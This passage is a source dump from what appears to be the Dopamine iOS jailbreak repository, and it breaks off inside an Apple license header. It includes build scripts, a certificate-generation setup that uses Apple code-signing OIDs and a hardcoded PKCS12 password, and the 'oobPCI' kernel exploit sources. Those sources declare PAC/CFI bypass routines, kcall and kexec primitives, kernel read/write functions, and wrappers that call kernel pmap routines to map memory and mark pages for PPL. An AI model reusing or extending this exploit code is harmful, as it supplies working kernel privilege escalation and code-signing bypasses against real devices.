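Dopamine 7 | xattr -rc build/Build/Products/Debug-iphoneos/Dopamine.app 8 | ldid -SDopamine/Dopamine.entitlements build/Build/Products/Debug-iphoneos/Dopamine.app/Dopamine 9 | ldid -s build/Build/Products/Debug-iphoneos/Dopamine.app 10 | rm -rf Payload Dopamine.tipa 11 | mkdir Payload 12 | cp -r build/Build/Products/Debug-iphoneos/Dopamine.app Payload/Dopamine.app 13 | zip -Ar Dopamine.tipa Payload 14 | rm -rf Payload 15 | 16 | build/Build/Products/Debug-iphoneos/Dopamine.app: FORCE 17 | xcodebuild -scheme Dopamine -derivedDataPath build -destination 'generic/platform=iOS' CODE_SIGN_IDENTITY=""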
CODE_SIGNING_REQUIRED=NO 18 | 19 | clean: 20 | rm -rf build Payload Dopamine.tipa 21 | 22 | build_clean: 23 | rm -rf Payload build 24 | 25 | FORCE: ; 26 | -------------------------------------------------------------------------------- /Dopamine/localization_keys.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | plutil -convert json "$1".lproj/Localizable.strings -o - | ruby -r json -e 'puts JSON.parse(STDIN.read).keys.sort' 3 | -------------------------------------------------------------------------------- /Dopamine/sort_localizations.sh: -------------------------------------------------------------------------------- 1 | localisort -t ./en.lproj/Localizable.strings -i ./ar.lproj/Localizable.strings -ct -r 2 | localisort -t ./en.lproj/Localizable.strings -i ./da.lproj/Localizable.strings -ct -r 3 | localisort -t ./en.lproj/Localizable.strings -i ./de.lproj/Localizable.strings -ct -r 4 | localisort -t ./en.lproj/Localizable.strings -i ./el.lproj/Localizable.strings -ct -r 5 | localisort -t ./en.lproj/Localizable.strings -i ./fil.lproj/Localizable.strings -ct -r 6 | localisort -t ./en.lproj/Localizable.strings -i ./fr.lproj/Localizable.strings -ct -r 7 | localisort -t ./en.lproj/Localizable.strings -i ./ja.lproj/Localizable.strings -ct -r 8 | localisort -t ./en.lproj/Localizable.strings -i ./kk.lproj/Localizable.strings -ct -r 9 | localisort -t ./en.lproj/Localizable.strings -i ./ko.lproj/Localizable.strings -ct -r 10 | localisort -t ./en.lproj/Localizable.strings -i ./nl.lproj/Localizable.strings -ct -r 11 | localisort -t ./en.lproj/Localizable.strings -i ./pl.lproj/Localizable.strings -ct -r 12 | localisort -t ./en.lproj/Localizable.strings -i ./pt-BR.lproj/Localizable.strings -ct -r 13 | localisort -t ./en.lproj/Localizable.strings -i ./ru.lproj/Localizable.strings -ct -r 14 | localisort -t ./en.lproj/Localizable.strings -i ./sv.lproj/Localizable.strings -ct -r 15 | localisort -t ./en.lproj/Localizable.strings 
-i ./tr.lproj/Localizable.strings -ct -r 16 | localisort -t ./en.lproj/Localizable.strings -i ./uk.lproj/Localizable.strings -ct -r 17 | localisort -t ./en.lproj/Localizable.strings -i ./ur.lproj/Localizable.strings -ct -r 18 | localisort -t ./en.lproj/Localizable.strings -i ./vi.lproj/Localizable.strings -ct -r 19 | localisort -t ./en.lproj/Localizable.strings -i ./zh_CN.lproj/Localizable.strings -ct -r 20 | localisort -t ./en.lproj/Localizable.strings -i ./zh_HK.lproj/Localizable.strings -ct -r 21 | localisort -t ./en.lproj/Localizable.strings -i ./zh_TW.lproj/Localizable.strings -ct -r 22 | localisort -t ./en.lproj/Localizable.strings -i ./zh-Hans.lproj/Localizable.strings -ct -r -------------------------------------------------------------------------------- /Exploits/fastPath/arm.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Exploits/fastPath/arm.pfx -------------------------------------------------------------------------------- /Exploits/fastPath/ca.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/ca.key 8 | certificate = $dir/ca.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 
28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN CA 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | 66 | [ v3_intermediate_ca ] 67 | # Extensions for a typical CA (`man x509v3_config`). 
68 | basicConstraints = critical, CA:true 69 | keyUsage = critical, digitalSignature, keyCertSign 70 | extendedKeyUsage = codeSigning 71 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 72 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 73 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 74 | -------------------------------------------------------------------------------- /Exploits/fastPath/clean.sh: -------------------------------------------------------------------------------- 1 | rm -f index.txt.* index.txt ca.key ca.crt cbd.crt itd.crt itd.key itd.csr.pem usr_arm.crt usr_arm.csr.pem usr_arm.key usr_x86_64.crt usr_x86_64.csr.pem usr_x86_64.key serial serial.* 2 | rm -rf ncerts 3 | -------------------------------------------------------------------------------- /Exploits/fastPath/genCrt.sh: -------------------------------------------------------------------------------- 1 | set -e 2 | 3 | openssl genrsa -out ca.key 2048 4 | openssl genrsa -out itd.key 2048 5 | openssl genrsa -out usr_x86_64.key 2048 6 | openssl genrsa -out usr_arm.key 2048 7 | 8 | openssl req -new -x509 -key ca.key -out ca.crt -config ca.conf -days 3650 -batch 9 | openssl req -config itd.conf -new -sha256 -key itd.key -out itd.csr.pem -batch 10 | openssl req -config usr_x86_64.conf -new -sha256 -key usr_x86_64.key -out usr_x86_64.csr.pem -batch 11 | openssl req -config usr_arm.conf -new -sha256 -key usr_arm.key -out usr_arm.csr.pem -batch 12 | 13 | echo 1000 > serial 14 | mkdir -p ncerts 15 | rm -f index.txt.* index.txt && touch index.txt 16 | 17 | openssl ca -config ca.conf -extensions v3_intermediate_ca -days 3650 -notext -in itd.csr.pem -out itd.crt -md sha256 -batch 18 | 19 | rm -f index.txt.* index.txt && touch index.txt 20 | 21 | openssl ca -config itd.conf -extensions x86_64_cert -days 3650 -notext -in usr_x86_64.csr.pem -out usr_x86_64.crt -md sha256 -batch 22 | 23 | rm -f index.txt.* index.txt && touch index.txt 24 | 25 | openssl ca -config itd.conf -extensions arm_cert -days 3650 
-notext -in usr_arm.csr.pem -out usr_arm.crt -md sha256 -batch 26 | # cbd.crt is the root and intermediate certificates concatenated; it is passed as -certfile to both exports below 27 | cat ca.crt itd.crt > cbd.crt 28 | # NOTE(review): both bundles are exported with the fixed password "password", and arm.pfx / x86_64.pfx are listed as files in this directory of the repository, so the private keys inside them must be treated as public 29 | openssl pkcs12 -export -out x86_64.pfx -inkey usr_x86_64.key -in usr_x86_64.crt -certfile cbd.crt -password pass:password 30 | openssl pkcs12 -export -out arm.pfx -inkey usr_arm.key -in usr_arm.crt -certfile cbd.crt -password pass:password 31 | -------------------------------------------------------------------------------- /Exploits/fastPath/usr_arm.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/itd.key 8 | certificate = $dir/itd.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults.
49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN Cert 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | -------------------------------------------------------------------------------- /Exploits/fastPath/usr_x86_64.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/itd.key 8 | certificate = $dir/itd.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 
40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN Cert 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | -------------------------------------------------------------------------------- /Exploits/fastPath/x86_64.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Exploits/fastPath/x86_64.pfx -------------------------------------------------------------------------------- /Exploits/oobPCI/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | /oobPCI 3 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Makefile: -------------------------------------------------------------------------------- 1 | SDK=macosx 2 | TARGET=arm64-apple-macos12.0 3 | 4 | CC=xcrun -sdk $(SDK) clang 5 | 6 | WARNINGS=-Wall -Wpedantic -Werror 7 | NO_WARNINGS=-Wno-gnu-statement-expression -Wno-gnu-zero-variadic-macro-arguments -Wno-gnu-empty-struct 
-Wno-dollar-in-identifier-extension -Wno-language-extension-token -Wno-zero-length-array 8 | CFLAGS=-target $(TARGET) -D__arm64__ -D__aarch64__ -D__DARWIN_OPAQUE_ARM_THREAD_STATE64 -nostdlib -O0 $(WARNINGS) $(NO_WARNINGS) 9 | LDFLAGS=-target $(TARGET) -nostdlib -dead-strip -fpie -lSystem 10 | 11 | MIG_SOURCES=$(wildcard Sources/*.defs) 12 | MIG_GENERATED_SOURCES=$(addprefix Sources/generated/,$(patsubst %.defs,%.c,$(notdir $(MIG_SOURCES)))) 13 | MIG_GENERATED_HEADERS=$(addprefix Sources/generated/,$(patsubst %.defs,%.h,$(notdir $(MIG_SOURCES)))) 14 | 15 | SOURCES=$(wildcard Sources/*.c) $(wildcard Sources/*.S) $(MIG_GENERATED_SOURCES) 16 | OBJS=$(addprefix build/,$(patsubst %.c,%.o,$(patsubst %.S,%.o,$(SOURCES)))) 17 | 18 | HEADERS=$(wildcard Sources/*.h) $(MIG_GENERATED_HEADERS) 19 | 20 | OUTPUT_DIRS=$(dir $(OBJS)) 21 | 22 | all: oobPCI 23 | 24 | .PHONY: all build_clean clean 25 | 26 | oobPCI: build/oobPCI 27 | install_name_tool -change /usr/lib/libSystem.B.dylib /System/DriverKit/System/Library/Frameworks/DriverKit.framework/DriverKit $< 28 | ../../Tools/Exe2Driver/Exe2Driver $< $@ 29 | @chmod +x $@ 30 | @ldid -SoobPCI.entitlements $@ 31 | 32 | build/oobPCI: ensure_output_dirs $(MIG_GENERATED_SOURCES) $(MIG_GENERATED_HEADERS) $(OBJS) 33 | $(CC) -o $@ $(OBJS) $(LDFLAGS) 34 | 35 | build/%.o: %.c $(HEADERS) 36 | $(CC) -c -o $@ $< $(CFLAGS) 37 | 38 | build/%.o: %.S $(HEADERS) 39 | $(CC) -c -o $@ $< $(CFLAGS) --std=c++11 40 | 41 | Sources/generated/%.h Sources/generated/%.c: Sources/%.defs 42 | mig -user $(patsubst %.h,%.c,$@) -header $(patsubst %.c,%.h,$@) -server /dev/null -sheader /dev/null $< 43 | 44 | ensure_output_dirs: 45 | mkdir -p $(OUTPUT_DIRS) 46 | 47 | build_clean: 48 | rm -rf build 49 | 50 | clean: build_clean 51 | rm -f oobPCI 52 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/DriverKitClasses.h: -------------------------------------------------------------------------------- 1 | // 2 | // 
DriverKitClasses.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef DriverKitClasses_h 10 | #define DriverKitClasses_h 11 | 12 | #ifndef DK_DECLARE_CLASS 13 | #define DK_DECLARE_CLASS(name) extern mach_port_t DKCLASS$$$##name; 14 | #endif 15 | 16 | DK_DECLARE_CLASS(IOUserServer) 17 | DK_DECLARE_CLASS(IODispatchQueue) 18 | DK_DECLARE_CLASS(IOBufferMemoryDescriptor) 19 | DK_DECLARE_CLASS(IODMACommand) 20 | 21 | #endif 22 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/Fugu15KRW.h: -------------------------------------------------------------------------------- 1 | // 2 | // Fugu15KRW.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef Fugu15KRW_h 10 | #define Fugu15KRW_h 11 | 12 | #include 13 | 14 | // Yes, Fugu15KRW supports versioning 15 | // No, I don't plan to actually increase the version number 16 | #define FUGU15KRW_VERSION_0 (uint64_t) 0 17 | #define FUGU15KRW_VERSION_CURRENT FUGU15KRW_VERSION_0 18 | 19 | #define FUGU15KRW_ERROR_BAD_SIZE (uint64_t) 1 20 | #define FUGU15KRW_ERROR_BAD_VERSION (uint64_t) 2 21 | #define FUGU15KRW_ERROR_BAD_REQ_ID (uint64_t) 3 22 | 23 | #define FUGU15KRW_REQ_PPL (mach_msg_id_t) 0xF1500 24 | #define FUGU15KRW_REQ_THSIGN (mach_msg_id_t) 0xF1501 25 | #define FUGU15KRW_REQ_OFFSETS (mach_msg_id_t) 0xF1502 26 | 27 | #define FUGU15KRW_REPLY_PPL (mach_msg_id_t) 0x52F1500 28 | #define FUGU15KRW_REPLY_THSIGN (mach_msg_id_t) 0x52F1501 29 | #define FUGU15KRW_REPLY_OFFSETS (mach_msg_id_t) 0x52F1502 30 | 31 | #define FUGU15KRW_REPLY_ERROR (mach_msg_id_t) 0x46457272 32 | 33 | typedef struct { 34 | mach_msg_header_t mach_header; 35 | uint64_t version; // Our version 36 | uint64_t versionMin; // The minimum version the server has to support 37 | } Fugu15KRWRequestCommon; 38 | 39 | typedef struct { 40 | mach_msg_header_t 
mach_header; 41 | uint64_t version; // Server version 42 | } Fugu15KRWReplyCommon; 43 | 44 | typedef struct { 45 | Fugu15KRWRequestCommon header; 46 | } Fugu15PPLMapRequest; 47 | 48 | typedef struct { 49 | Fugu15KRWReplyCommon header; 50 | uint64_t mapAddr; 51 | } Fugu15PPLMapReply; 52 | 53 | typedef struct { 54 | Fugu15KRWRequestCommon header; 55 | uint64_t signAddr; 56 | } Fugu15ThSignRequest; 57 | 58 | typedef struct { 59 | Fugu15KRWReplyCommon header; 60 | } Fugu15ThSignReply; 61 | 62 | typedef struct { 63 | Fugu15KRWRequestCommon header; 64 | } Fugu15OffsetsRequest; 65 | 66 | typedef struct { 67 | Fugu15KRWReplyCommon header; 68 | uint64_t virtualBase; // As reported in the boot args structure 69 | uint64_t physicalBase; // As reported in the boot args structure 70 | uint64_t vKernelBase; // pKernelBase = vKernelBase - virtualBase + physicalBase 71 | uint64_t kernelSlide; // vKernelBase - default kernel load address 72 | uint64_t kernelTTEP; // Root translation table of the kernel, physical address 73 | } Fugu15OffsetsReply; 74 | 75 | typedef struct { 76 | Fugu15KRWReplyCommon header; 77 | uint64_t errorCode; 78 | } Fugu15ErrorReply; 79 | 80 | #endif /* Fugu15KRW_h */ 81 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/badRecovery.h: -------------------------------------------------------------------------------- 1 | // 2 | // badRecovery.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef badRecovery_h 10 | #define badRecovery_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | typedef struct { 17 | uint64_t unk; 18 | uint64_t x[29]; 19 | uint64_t fp; 20 | uint64_t lr; 21 | uint64_t sp; 22 | uint64_t pc; 23 | uint32_t cpsr; 24 | // Other stuff 25 | uint64_t other[70]; 26 | } kRegisterState; 27 | 28 | typedef struct { 29 | bool inited; 30 | thread_t gExploitThread; 31 | uint64_t gScratchMemKern; 32 | volatile uint64_t *gScratchMemMapped; 33 | arm_thread_state64_t gExploitThreadState; 34 | uint64_t gSpecialMemRegion; 35 | uint64_t gIntStack; 36 | uint64_t gOrigIntStack; 37 | uint64_t gReturnContext; 38 | uint64_t gACTPtr; 39 | uint64_t gACTVal; 40 | uint64_t gCPUData; 41 | } exploitThreadInfo; 42 | 43 | typedef struct { 44 | bool inited; 45 | thread_t thread; 46 | uint64_t actContext; 47 | kRegisterState signedState; 48 | uint64_t kernelStack; 49 | kRegisterState *mappedState; 50 | uint64_t scratchMemory; 51 | uint64_t *scratchMemoryMapped; 52 | } Fugu14KcallThread; 53 | 54 | bool breakCFI(uint64_t kernelBase); 55 | void deinitFugu15PACBypass(void); 56 | 57 | bool setupFugu14Kcall(void); 58 | 59 | void pac_exploit_thread(void); 60 | void pac_exploit_doIt(void); 61 | void pac_loop(void); 62 | 63 | void ppl_loop(void); 64 | void ppl_done(void); 65 | 66 | void kexec(kRegisterState *state, exploitThreadInfo *info); 67 | uint64_t kcall(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, uint64_t a6, uint64_t a7, uint64_t a8); 68 | 69 | bool kexec_on_new_thread(kRegisterState *kState, thread_t *thread); 70 | 71 | #endif /* badRecovery_h */ 72 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/includeme.h: -------------------------------------------------------------------------------- 1 | // 2 | // includeme.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef includeme_h 10 | #define includeme_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | // SpawnDrv/kexploitd helper functions 18 | #define DBG_DK_FUNC(id) ptrauth_sign_unauthenticated((void*)(0x4142434400ULL + (id * 4ULL)), ptrauth_key_function_pointer, 0) 19 | #define DBG_EXPLOIT_FUNC(id) ptrauth_sign_unauthenticated((void*)(0x4841585800ULL + (id * 4ULL)), ptrauth_key_function_pointer, 0) 20 | 21 | #define DBG_DK_FUNC_CHECKIN DBG_DK_FUNC(0) 22 | #define DBG_DK_FUNC_NOTIFY DBG_DK_FUNC(1) 23 | #define DBG_DK_FUNC_GET_PCI_SIZE DBG_DK_FUNC(2) 24 | 25 | #define DBG_GETOFFSETS_FUNC DBG_EXPLOIT_FUNC(0) 26 | #define DBG_KRW_READY_FUNC DBG_EXPLOIT_FUNC(1) 27 | #define DBG_SET_FAULT_HNDLR DBG_EXPLOIT_FUNC(2) 28 | #define DBG_GET_REQUEST DBG_EXPLOIT_FUNC(3) 29 | #define DBG_SEND_REPLY DBG_EXPLOIT_FUNC(4) 30 | // #define DBG_COPYOUT_PORTS DBG_EXPLOIT_FUNC(5) 31 | #define DBG_WRITE_BOOT_INFO_UINT64 DBG_EXPLOIT_FUNC(6) 32 | #define DBG_WRITE_BOOT_INFO_DATA DBG_EXPLOIT_FUNC(7) 33 | 34 | #define DBG_SEND_SYNC_LOG DBG_EXPLOIT_FUNC(8) 35 | 36 | // Debug stuff 37 | #define DBGPRINT_ADDRVAR(var) printf("[DBG] %s: %s @ %p\n", __func__, #var, (void*) var) 38 | #define DBGPRINT_VAR(var) printf("[DBG] %s: %s: %p\n", __func__, #var, (void*) (uint64_t) var) 39 | 40 | // Did I mention that I love Swift? 41 | #define guard(cond) if (__builtin_expect(!!(cond), 1)) {} 42 | 43 | #define MEMORY_BARRIER asm volatile("dmb sy"); 44 | 45 | extern void status_update(const char *status); 46 | 47 | #endif /* includeme_h */ 48 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernel.c: -------------------------------------------------------------------------------- 1 | // 2 | // kernel.c 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
//

#include "kernel.h"

#include "includeme.h"
#include "offsets.h"
#include "badRecovery.h"

/*
 * Wrappers that invoke kernel pmap routines through kcall().
 *
 * Each wrapper resolves the routine address with SLIDE(gOffsets.<field>) and
 * forwards its arguments through kcall(), which takes the target address plus
 * eight argument slots (see badRecovery.h); unused slots are passed as 0.
 * SLIDE and gOffsets are not defined in this file (presumably offsets.h).
 */

/*
 * Calls the routine at gOffsets.pmap_enter_options_addr for `pmap`.
 *
 * The wrapper takes (pmap, pa, va) but passes the kernel
 * (pmap, va, pa, VM_PROT_READ | VM_PROT_WRITE, 0, 0, 1, 1): note that the
 * virtual address comes before the physical one in the forwarded call.
 *
 * Returns the first result that is not KERN_RESOURCE_SHORTAGE.
 *
 * NOTE(review): the page-donation call for the shortage case is commented
 * out, so a persistent KERN_RESOURCE_SHORTAGE is retried forever with no
 * back-off or retry limit. Confirm that this is intended.
 */
kern_return_t pmap_enter_options_addr(uint64_t pmap, uint64_t pa, uint64_t va) {
    const uint64_t target = SLIDE(gOffsets.pmap_enter_options_addr);
    kern_return_t result;

    do {
        result = (kern_return_t) kcall(target, pmap, va, pa, VM_PROT_READ | VM_PROT_WRITE, 0, 0, 1, 1);
        // On resource shortage, alloc new page
        //pmap_alloc_page_for_ppl();
    } while (result == KERN_RESOURCE_SHORTAGE);

    return result;
}

/*
 * Calls the routine at gOffsets.pmap_remove_options with (pmap, start, end)
 * and the constant 0x100 as fourth argument. The return value is discarded.
 * NOTE(review): 0x100 is presumably an options flag - confirm its meaning.
 */
void pmap_remove(uint64_t pmap, uint64_t start, uint64_t end) {
    const uint64_t target = SLIDE(gOffsets.pmap_remove_options);

    (void) kcall(target, pmap, start, end, 0x100, 0, 0, 0, 0);
}

/*
 * Calls the routine at gOffsets.pmap_set_nested with `pmap` as its only
 * argument. The return value is discarded.
 */
void pmap_set_nested(uint64_t pmap) {
    const uint64_t target = SLIDE(gOffsets.pmap_set_nested);

    (void) kcall(target, pmap, 0, 0, 0, 0, 0, 0, 0);
}

/*
 * Calls the routine at gOffsets.pmap_nest with (grand, subord, vstart, size)
 * and returns its result as a kern_return_t.
 */
kern_return_t pmap_nest(uint64_t grand, uint64_t subord, uint64_t vstart, uint64_t size) {
    const uint64_t target = SLIDE(gOffsets.pmap_nest);
    const uint64_t raw = kcall(target, grand, subord, vstart, size, 0, 0, 0, 0);

    return (kern_return_t) raw;
}

/*
 * Calls the routine at gOffsets.pmap_mark_page_as_ppl_page with (page, 1).
 * The return value is discarded.
 */
void pmap_mark_page_as_ppl_page(uint64_t page) {
    const uint64_t target = SLIDE(gOffsets.pmap_mark_page_as_ppl_page);

    (void) kcall(target, page, 1, 0, 0, 0, 0, 0, 0);
}

/*
 * Calls the routine at gOffsets.pmap_alloc_page_for_kern with no arguments
 * and returns the raw 64-bit result. pmap_alloc_page_for_ppl() treats a
 * result of 0 as "no page".
 */
uint64_t pmap_alloc_page_for_kern(void)
{
    const uint64_t target = SLIDE(gOffsets.pmap_alloc_page_for_kern);

    return kcall(target, 0, 0, 0, 0, 0, 0, 0, 0);
}

/*
 * Obtains a page with pmap_alloc_page_for_kern() and, when the result is
 * non-zero, hands it to pmap_mark_page_as_ppl_page(). The thread-option
 * handling around the allocation is disabled (kept below as comments).
 */
void pmap_alloc_page_for_ppl(void)
{
    //thread_t self = current_thread();

    //uint16_t thread_options = self->options;
    //self->options |= TH_OPT_VMPRIV;
    const uint64_t page = pmap_alloc_page_for_kern();
    //self->options = thread_options;

    if (page == 0) {
        return;
    }
    pmap_mark_page_as_ppl_page(page);
}
-------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernel.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernel.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef kernel_h 10 | #define kernel_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | kern_return_t pmap_enter_options_addr(uint64_t pmap, uint64_t pa, uint64_t va); 17 | void pmap_remove(uint64_t pmap, uint64_t start, uint64_t end); 18 | 19 | void pmap_set_nested(uint64_t pmap); 20 | kern_return_t pmap_nest(uint64_t grand, uint64_t subord, uint64_t vstart, uint64_t size); 21 | 22 | void pmap_mark_page_as_ppl_page(uint64_t page); 23 | uint64_t pmap_alloc_page_for_kern(void); 24 | void pmap_alloc_page_for_ppl(void); 25 | 26 | #endif /* kernel_h */ 27 | 28 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernrw_alloc.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernrw_alloc.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef kernrw_alloc_h 10 | #define kernrw_alloc_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool kernread (uint64_t addr, size_t len, void *buffer); 17 | bool kernwrite(uint64_t addr, void *buffer, size_t len); 18 | 19 | uint64_t kmemAlloc(uint64_t size, void **mappedAddr, bool leak); 20 | 21 | #endif /* kernrw_alloc_h */ 22 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/mach_host.defs: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY 